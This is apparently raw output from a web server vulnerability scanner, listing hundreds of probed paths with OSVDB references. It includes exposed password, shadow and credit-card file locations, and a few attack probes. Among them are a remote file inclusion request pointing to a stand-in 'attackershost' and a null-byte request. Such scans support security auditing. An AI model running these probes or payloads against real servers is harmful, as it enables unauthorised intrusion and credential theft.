+ OSVDB-3092: /demo/: This might be interesting...
+ OSVDB-3092: /demos/: This might be interesting...
+ OSVDB-3092: /dev/: This might be interesting...
+ OSVDB-3092: /devel/: This might be interesting...
+ OSVDB-3092: /development/: This might be interesting...
+ OSVDB-3092: /dir/: This might be interesting...
+ OSVDB-3092: /directory/: This might be interesting...
+ OSVDB-3092: /DMR/: This might be interesting...
+ OSVDB-3092: /doc-html/: This might be interesting...
+ OSVDB-3092: /down/: This might be interesting...
+ OSVDB-3092: /download/: This might be interesting...
+ OSVDB-3092: /downloads/: This might be interesting...
+ OSVDB-3092: /easylog/easylog.html: This might be interesting...
+ OSVDB-3092: /ejemplo/: This might be interesting...
+ OSVDB-3092: /ejemplos/: This might be interesting...
+ OSVDB-3092: /employees/: This might be interesting...
+ OSVDB-3092: /envia/: This might be interesting...
+ OSVDB-3092: /enviamail/: This might be interesting...
+ OSVDB-3092: /error_log: This might be interesting...
+ OSVDB-3092: /excel/: This might be interesting...
+ OSVDB-3092: /Excel/: This might be interesting...
+ OSVDB-3092: /EXE/: This might be interesting...
+ OSVDB-3092: /exe/: This might be interesting...
+ OSVDB-3092: /fbsd/: This might be interesting...
+ OSVDB-3092: /file/: This might be interesting...
+ OSVDB-3092: /fileadmin/: This might be interesting...
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3092: /forum/: This might be interesting...
+ OSVDB-3092: /forums/: This might be interesting...
+ OSVDB-3092: /foto/: This might be interesting...
+ OSVDB-3092: /fotos/: This might be interesting...
+ OSVDB-3092: /fpadmin/: This might be interesting...
+ OSVDB-3092: /ftp/: This might be interesting...
+ OSVDB-3092: /gfx/: This might be interesting...
+ OSVDB-3092: /global/: This might be interesting...
+ OSVDB-3092: /graphics/: This might be interesting...
+ OSVDB-3092: /guest/: This might be interesting...
+ OSVDB-3092: /guestbook/: This might be interesting...
+ OSVDB-3092: /guests/: This might be interesting...
+ OSVDB-3092: /hidden/: This might be interesting...
+ OSVDB-3092: /hitmatic/: This might be interesting...
+ OSVDB-3092: /hitmatic/analyse.cgi: This might be interesting...
+ OSVDB-3092: /hits.txt: This might be interesting...
+ OSVDB-3092: /hit_tracker/: This might be interesting...
+ OSVDB-3092: /home/: This might be interesting...
+ OSVDB-3092: /homepage/: This might be interesting...
+ OSVDB-3092: /htdocs/: This might be interesting...
+ OSVDB-3092: /html/: This might be interesting...
+ OSVDB-3092: /htpasswd: This might be interesting...
+ OSVDB-3092: /HyperStat/stat_what.log: This might be interesting...
+ OSVDB-3092: /hyperstat/stat_what.log: This might be interesting...
+ OSVDB-3092: /ibill/: This might be interesting...
+ OSVDB-3092: /idea/: This might be interesting...
+ OSVDB-3092: /ideas/: This might be interesting...
+ OSVDB-3092: /imagenes/: This might be interesting...
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /imgs/: This might be interesting...
+ OSVDB-3092: /import/: This might be interesting...
+ OSVDB-3092: /impreso/: This might be interesting...
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /incoming/: This might be interesting...
+ OSVDB-3092: /info/: This might be interesting...
+ OSVDB-3092: /informacion/: This might be interesting...
+ OSVDB-3092: /information/: This might be interesting...
+ OSVDB-3092: /ingresa/: This might be interesting...
+ OSVDB-3092: /ingreso/: This might be interesting...
+ OSVDB-3092: /install/: This might be interesting...
+ OSVDB-3092: /internal/: This might be interesting...
+ OSVDB-3092: /intranet/: This might be interesting...
+ OSVDB-3092: /invitado/: This might be interesting...
+ OSVDB-3092: /invitados/: This might be interesting...
+ OSVDB-3092: /java/: This might be interesting...
+ OSVDB-3092: /jdbc/: This might be interesting...
+ OSVDB-3092: /job/: This might be interesting...
+ OSVDB-3092: /jrun/: This might be interesting...
+ OSVDB-3092: /js: This might be interesting...
+ OSVDB-3092: /lib/: This might be interesting...
+ OSVDB-3092: /library/: This might be interesting...
+ OSVDB-3092: /libro/: This might be interesting...
+ OSVDB-3092: /linux/: This might be interesting...
+ OSVDB-3092: /log.htm: This might be interesting...
+ OSVDB-3092: /log.html: This might be interesting...
+ OSVDB-3092: /log.txt: This might be interesting...
+ OSVDB-3092: /logfile: This might be interesting...
+ OSVDB-3092: /logfile.htm: This might be interesting...
+ OSVDB-3092: /logfile.html: This might be interesting...
+ OSVDB-3092: /logfile.txt: This might be interesting...
+ OSVDB-3092: /logfile/: This might be interesting...
+ OSVDB-3092: /logfiles/: This might be interesting...
+ OSVDB-3092: /logger.html: This might be interesting...
+ OSVDB-3092: /logger/: This might be interesting...
+ OSVDB-3092: /logging/: This might be interesting...
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3092: /logs.txt: This might be interesting...
+ OSVDB-3092: /logs/: This might be interesting...
+ OSVDB-3092: /logs/access_log: This might be interesting...
+ OSVDB-3092: /logs/error_log: This might be interesting...
+ OSVDB-3092: /lost+found/: This might be interesting...
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /manage/cgi/cgiproc: This might be interesting...
+ OSVDB-3092: /marketing/: This might be interesting...
+ OSVDB-3092: /master.password: This might be interesting...
+ OSVDB-3092: /mbox: This might be interesting...
+ OSVDB-3092: /members/: This might be interesting...
+ OSVDB-3092: /message/: This might be interesting...
+ OSVDB-3092: /messaging/: This might be interesting...
+ OSVDB-3092: /ministats/admin.cgi: This might be interesting...
+ OSVDB-3092: /misc/: This might be interesting...
+ OSVDB-3092: /mkstats/: This might be interesting...
+ OSVDB-3092: /movimientos/: This might be interesting...
+ OSVDB-3092: /mp3/: This might be interesting...
+ OSVDB-3092: /mqseries/: This might be interesting...
+ OSVDB-3092: /msql/: This might be interesting...
+ OSVDB-3092: /msword/: This might be interesting...
+ OSVDB-3092: /Msword/: This might be interesting...
+ OSVDB-3092: /MSword/: This might be interesting...
+ OSVDB-3092: /NetDynamic/: This might be interesting...
+ OSVDB-3092: /NetDynamics/: This might be interesting...
+ OSVDB-3092: /netscape/: This might be interesting...
+ OSVDB-3092: /new: This may be interesting...
+ OSVDB-3092: /new/: This might be interesting...
+ OSVDB-3092: /news: This might be interesting...
+ OSVDB-3092: /noticias/: This might be interesting...
+ OSVDB-3092: /odbc/: This might be interesting...
+ OSVDB-3092: /officescan/cgi/jdkRqNotify.exe: This might be interesting...
+ OSVDB-3092: /old/: This might be interesting...
+ OSVDB-3092: /oracle: This might be interesting...
+ OSVDB-3092: /oradata/: This might be interesting...
+ OSVDB-3092: /order/: This might be interesting...
+ OSVDB-3092: /orders/: This might be interesting...
+ OSVDB-3092: /orders/checks.txt: This might be interesting...
+ OSVDB-3092: /orders/mountain.cfg: This might be interesting...
+ OSVDB-3092: /orders/orders.log: This might be interesting...
+ OSVDB-3092: /orders/orders.txt: This might be interesting...
+ OSVDB-3092: /outgoing/: This might be interesting...
+ OSVDB-3092: /ows/: This might be interesting... Oracle Web Services?
+ OSVDB-3092: /pages/: This might be interesting...
+ OSVDB-3092: /Pages/: This might be interesting...
+ OSVDB-3092: /passwd: This could be interesting...
+ OSVDB-3092: /passwd.adjunct: This could be interesting...
+ OSVDB-3092: /passwd.txt: This could be interesting...
+ OSVDB-3092: /passwdfile: This might be interesting...
+ OSVDB-3092: /password: This could be interesting...
+ OSVDB-3092: /passwords.txt: This could be interesting...
+ OSVDB-3092: /passwords/: This might be interesting...
+ OSVDB-3092: /PDG_Cart/: This might be interesting...
+ OSVDB-3092: /people.list: This might be interesting...
+ OSVDB-3092: /perl5/: This might be interesting...
+ OSVDB-3092: /php/: This might be interesting...
+ OSVDB-3092: /pics/: This might be interesting...
+ OSVDB-3092: /piranha/secure/passwd.php3: This might be interesting...
+ OSVDB-3092: /pix/: This might be interesting...
+ OSVDB-3092: /poll: This might be interesting...
+ OSVDB-3092: /polls: This might be interesting...
+ OSVDB-3092: /porn/: This might be interesting...
+ OSVDB-3092: /pr0n/: This might be interesting...
+ OSVDB-3092: /privado/: This might be interesting...
+ OSVDB-3092: /private/: This might be interesting...
+ OSVDB-3092: /prod/: This might be interesting...
+ OSVDB-3092: /pron/: This might be interesting...
+ OSVDB-3092: /prueba/: This might be interesting...
+ OSVDB-3092: /pruebas/: This might be interesting...
+ OSVDB-3092: /pub/: This might be interesting...
+ OSVDB-3092: /public/: This might be interesting...
+ OSVDB-3092: /publica/: This might be interesting...
+ OSVDB-3092: /publicar/: This might be interesting...
+ OSVDB-3092: /publico/: This might be interesting...
+ OSVDB-3092: /purchase/: This might be interesting...
+ OSVDB-3092: /purchases/: This might be interesting...
+ OSVDB-3092: /pwd.db: This might be interesting...
+ OSVDB-3092: /python/: This might be interesting...
+ OSVDB-3092: /readme: This might be interesting...
+ OSVDB-3092: /README.TXT: This might be interesting...
+ OSVDB-3092: /readme.txt: This might be interesting...
+ OSVDB-3092: /register/: This might be interesting...
+ OSVDB-3092: /registered/: This might be interesting...
+ OSVDB-3092: /reports/: This might be interesting...
+ OSVDB-3092: /reseller/: This might be interesting...
+ OSVDB-3092: /restricted/: This might be interesting...
+ OSVDB-3092: /retail/: This might be interesting...
+ OSVDB-3092: /reviews/newpro.cgi: This might be interesting...
+ OSVDB-3092: /sales/: This might be interesting...
+ OSVDB-3092: /sample/: This might be interesting...
+ OSVDB-3092: /samples/: This might be interesting...
+ OSVDB-3092: /save/: This might be interesting...
+ OSVDB-3092: /scr/: This might be interesting...
+ OSVDB-3092: /scratch: This might be interesting...
+ OSVDB-3092: /scripts/weblog: This might be interesting...
+ OSVDB-3092: /search.vts: This might be interesting...
+ OSVDB-3092: /search97.vts: This might be interesting...
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3092: /sell/: This might be interesting...
+ OSVDB-3092: /service/: This might be interesting...
+ OSVDB-3092: /servicio/: This might be interesting...
+ OSVDB-3092: /servicios/: This might be interesting...
+ OSVDB-3092: /setup/: This might be interesting...
+ OSVDB-3092: /shop/: This might be interesting...
+ OSVDB-3092: /shopper/: This might be interesting...
+ OSVDB-3092: /solaris/: This might be interesting...
+ OSVDB-3092: /Sources/: This might be interesting... may be YaBB.
+ OSVDB-3092: /spwd: This might be interesting...
+ OSVDB-3092: /srchadm: This might be interesting...
+ OSVDB-3092: /ss.cfg: This might be interesting...
+ OSVDB-3092: /staff/: This might be interesting...
+ OSVDB-3092: /stat.htm: This might be interesting...
+ OSVDB-3092: /stat/: This might be interesting...
+ OSVDB-3092: /statistic/: This might be interesting...
+ OSVDB-3092: /Statistics/: This might be interesting...
+ OSVDB-3092: /statistics/: This might be interesting...
+ OSVDB-3092: /stats.htm: This might be interesting...
+ OSVDB-3092: /stats.html: This might be interesting...
+ OSVDB-3092: /stats.txt: This might be interesting...
+ OSVDB-3092: /stats/: This might be interesting...
+ OSVDB-3092: /Stats/: This might be interesting...
+ OSVDB-3092: /status/: This might be interesting...
+ OSVDB-3092: /store/: This might be interesting...
+ OSVDB-3092: /StoreDB/: This might be interesting...
+ OSVDB-3092: /stylesheet/: This might be interesting...
+ OSVDB-3092: /stylesheets/: This might be interesting...
+ OSVDB-3092: /subir/: This might be interesting...
+ OSVDB-3092: /sun/: This might be interesting...
+ OSVDB-3092: /super_stats/access_logs: This might be interesting...
+ OSVDB-3092: /super_stats/error_logs: This might be interesting...
+ OSVDB-3092: /support/: This might be interesting...
+ OSVDB-3092: /swf: This might be interesting... Flash files?
+ OSVDB-3092: /sys/: This might be interesting...
+ OSVDB-3092: /system/: This might be interesting...
+ OSVDB-3092: /tar/: This might be interesting...
+ OSVDB-3092: /tarjetas/: This might be interesting...
+ OSVDB-3092: /temp/: This might be interesting...
+ OSVDB-3092: /template/: This may be interesting as the directory may hold sensitive files or reveal system information.
+ OSVDB-3092: /temporal/: This might be interesting...
+ OSVDB-3092: /test.htm: This might be interesting...
+ OSVDB-3092: /test.html: This might be interesting...
+ OSVDB-3092: /test.txt: This might be interesting...
+ OSVDB-3092: /test/: This might be interesting...
+ OSVDB-3092: /testing/: This might be interesting...
+ OSVDB-3092: /tests/: This might be interesting...
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3092: /tools/: This might be interesting...
+ OSVDB-3092: /tpv/: This might be interesting...
+ OSVDB-3092: /trabajo/: This might be interesting...
+ OSVDB-3092: /trafficlog/: This might be interesting...
+ OSVDB-3092: /transito/: This might be interesting...
+ OSVDB-3092: /tree/: This might be interesting...
+ OSVDB-3092: /trees/: This might be interesting...
+ OSVDB-3092: /updates/: This might be interesting...
+ OSVDB-3092: /user/: This might be interesting...
+ OSVDB-3092: /users/: This might be interesting...
+ OSVDB-3092: /users/scripts/submit.cgi: This might be interesting...
+ OSVDB-3092: /ustats/: This might be interesting...
+ OSVDB-3092: /usuario/: This might be interesting...
+ OSVDB-3092: /usuarios/: This might be interesting...
+ OSVDB-3092: /vfs/: This might be interesting...
+ OSVDB-3092: /w3perl/admin: This might be interesting...
+ OSVDB-3092: /warez/: This might be interesting...
+ OSVDB-3092: /web/: This might be interesting...
+ OSVDB-3092: /web800fo/: This might be interesting...
+ OSVDB-3092: /webaccess.htm: This might be interesting...
+ OSVDB-3092: /webaccess/access-options.txt: This might be interesting...
+ OSVDB-3092: /webadmin/: This might be interesting...may be HostingController, www.hostingcontroller.com
+ OSVDB-3092: /webboard/: This might be interesting...
+ OSVDB-3092: /webcart-lite/: This might be interesting...
+ OSVDB-3092: /webcart/: This might be interesting...
+ OSVDB-3092: /webdata/: This might be interesting...
+ OSVDB-3092: /weblog/: This might be interesting...
+ OSVDB-3092: /weblogs/: This might be interesting...
+ OSVDB-3092: /webmaster_logs/: This might be interesting...
+ OSVDB-3092: /WebShop/: This might be interesting...
+ OSVDB-3092: /WebShop/logs/cc.txt: This might be interesting...
+ OSVDB-3092: /WebShop/templates/cc.txt: This might be interesting...
+ OSVDB-3092: /website/: This might be interesting...
+ OSVDB-3092: /webstats/: This might be interesting...
+ OSVDB-3092: /WebTrend/: This might be interesting...
+ OSVDB-3092: /Web_store/: This might be interesting...
+ OSVDB-3092: /windows/: This might be interesting...
+ OSVDB-3092: /word/: This might be interesting...
+ OSVDB-3092: /work/: This might be interesting...
+ OSVDB-3092: /wstats/: This might be interesting...
+ OSVDB-3092: /wusage/: This might be interesting...
+ OSVDB-3092: /www-sql/: This might be interesting...
+ OSVDB-3092: /www/: This might be interesting...
+ OSVDB-3092: /wwwboard/wwwboard.cgi: This might be interesting...
+ OSVDB-3092: /wwwboard/wwwboard.pl: This might be interesting...
+ OSVDB-3092: /wwwjoin/: This might be interesting...
+ OSVDB-3092: /wwwlog/: This might be interesting...
+ OSVDB-3092: /wwwstats.html: This might be interesting...
+ OSVDB-3092: /wwwstats/: This might be interesting...
+ OSVDB-3092: /wwwthreads/3tvars.pm: This might be interesting...
+ OSVDB-3092: /wwwthreads/w3tvars.pm: This might be interesting...
+ OSVDB-3092: /zipfiles/: This might be interesting...
+ OSVDB-13483: /adsamples/config/site.csc: Contains SQL username/password
+ OSVDB-3092: /advworks/equipment/catalog_type.asp: This might be interesting...
+ OSVDB-3092: /carbo.dll: This might be interesting...
+ OSVDB-17670: /clocktower/: Site Server sample files. This might be interesting...
+ OSVDB-17670: /market/: Site Server sample files. This might be interesting.
+ OSVDB-17670: /mspress30/: Site Server sample files. This might be interesting...
+ OSVDB-3092: /sam: This might be interesting...
+ OSVDB-3092: /sam.bin: This might be interesting...
+ OSVDB-3092: /sam._: This might be interesting...
+ OSVDB-3092: /samples/search/queryhit.htm: This might be interesting...
+ OSVDB-3092: /scripts/counter.exe: This might be interesting...
+ OSVDB-17669: /scripts/cphost.dll: cphost.dll may have a DoS and a traversal issue.
+ OSVDB-3092: /scripts/fpadmcgi.exe: This might be interesting...
+ OSVDB-3092: /scripts/postinfo.asp: This might be interesting...
+ OSVDB-3092: /scripts/samples/ctguestb.idc: This might be interesting...
+ OSVDB-3092: /scripts/samples/search/webhits.exe: This might be interesting...
+ OSVDB-3092: /site/iissamples/: This might be interesting...
+ OSVDB-17670: /vc30/: Site Server sample files. This might be interesting...
+ OSVDB-3092: /_mem_bin/: This might be interesting - User Login
+ OSVDB-3092: /_mem_bin/FormsLogin.asp: This might be interesting - User Login
+ OSVDB-3092: /perl/files.pl: This might be interesting...
+ OSVDB-3092: /perl5/files.pl: This might be interesting...
+ OSVDB-3092: /scripts/convert.bas: This might be interesting...
+ OSVDB-3092: /owa_util%2esignature: Unknown, may be interesting
+ OSVDB-3233: /cgi-dos/args.bat: Default FrontPage CGI found.
+ OSVDB-3092: /custdata/: This may be COWS (CGI Online Worldweb Shopping), and may be interesting...
+ OSVDB-3092: /hostingcontroller/: This might be interesting...probably HostingController, www.hostingcontroller.com
+ OSVDB-3092: /data.sql: Database SQL?
+ OSVDB-3092: /databases/: Databases? Really??
+ OSVDB-3092: /databse.sql: Database SQL?
+ OSVDB-3092: /db.sql: Database SQL?
+ OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
+ OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
+ OSVDB-3092: /javadoc/: Documentation...?
+ OSVDB-3092: /log/: Ahh...log information...fun!
+ OSVDB-3092: /manager/: May be a web server or site manager.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3092: /exchange/: This may be interesting (Outlook exchange OWA server?)...
+ OSVDB-3093: /finance.xls: Finance spreadsheet?
+ OSVDB-3093: /finances.xls: Finance spreadsheet?
+ OSVDB-3093: /abonnement.asp: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /acartpath/signin.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /add_acl: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/auth.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cfg/configscreen.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cfg/configsite.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cfg/configsql.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cfg/configtache.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cms/htmltags.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/credit_card_info.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/exec.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/modules/cache.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/objects.inc.php4: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/script.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/settings.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/templates/header.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/upload.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin_t/include/aff_liste_langue.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /adv/gm001-mc/: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /aff_news.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /approval/ts_app.htm: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /archive.asp: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /archive_forum.asp: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ashnews.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /auth.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /b2-tools/gm-2-b2.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /bandwidth/index.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /basilix.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /bigsam_guestbook.php?displayBegin=9999...9999: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /bin/common/user_update_passwd.pl: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /biztalktracking/RawCustomSearchField.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /biztalktracking/rawdocdata.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /board/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /board/philboard_admin.asp+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /bugtest+/+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /caupo/admin/admin_workspace.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ccbill/whereami.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /chat_dir/register.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /checkout_payment.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /communique.asp: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /community/forumdisplay.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /community/index.php?analized=anything: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /community/member.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /compte.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /config/html/cnf_gi.htm: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /convert-date.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /cp/rac/nsManager.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /csPassword.cgi?command=remove%20: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /cutenews/comments.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /cutenews/search.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /cutenews/shownews.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /Data/settings.xml+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /database/metacart.mdb+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /db.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /dbabble: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /dcp/advertiser.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /defines.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /dltclnt.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /doc/admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /docs/NED: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /dotproject/modules/files/index_table.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /dotproject/modules/projects/addedit.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /dotproject/modules/projects/view.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /dotproject/modules/projects/vw_files.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /dotproject/modules/tasks/addedit.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /dotproject/modules/tasks/viewgantt.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /do_map: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /do_subscribe: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /email.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /emml_email_func.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /emumail.cgi?type=.%00: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /entete.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /enteteacceuil.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /etc/shadow+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /eventcal2.php.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ez2000/ezadmin.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ez2000/ezboard.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ez2000/ezman.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /faqman/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /filemanager/index.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /filemgmt/brokenfile.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /filemgmt/singlefile.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /filemgmt/viewcat.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /filemgmt/visit.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /foro/YaBB.pl: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum/mainfile.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum/member.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum/newreply.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum/newthread.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum/viewtopic.php: phpBB found.
+ OSVDB-3093: /forum_arc.asp?n=268: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum_professionnel.asp?n=100: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /functions.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-10447: /get_od_toc.pl?Profile=: WebTrends get_od_toc.pl may be vulnerable to a path disclosure error if this file is reloaded multiple times.
+ OSVDB-3093: /globals.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /globals.pl: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-6656: /Gozila.cgi: Linksys BEF Series routers are vulnerable to multiple DoS attacks in Gozila.cgi.
+ OSVDB-3093: /homebet/homebet.dll?form=menu&amp;option=menu-signin: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /idealbb/error.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /iisprotect/admin/SiteAdmin.ASP?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /include/customize.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /include/help.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /includes/footer.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /includes/header.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /infos/contact/index.asp: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /infos/faq/index.asp: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /infos/gen/index.asp: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /infos/services/index.asp: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /instaboard/index.cfm: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /intranet/browse.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /invitefriends.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ipchat.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ixmail_netattach.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /jsptest.jsp+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /kernel/class/delete.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /kernel/classes/ezrole.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ldap.search.php3?ldap_serv=nonsense%20: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /livredor/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /login.php3?reason=chpass2%20: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /mail/include.html: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /mail/settings.html: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /mambo/banners.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /manage/login.asp+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /members/ID.pm: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /members/ID.xbb: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /mod.php: This might be interesting... has been seen in web logs from an unknown scanner.
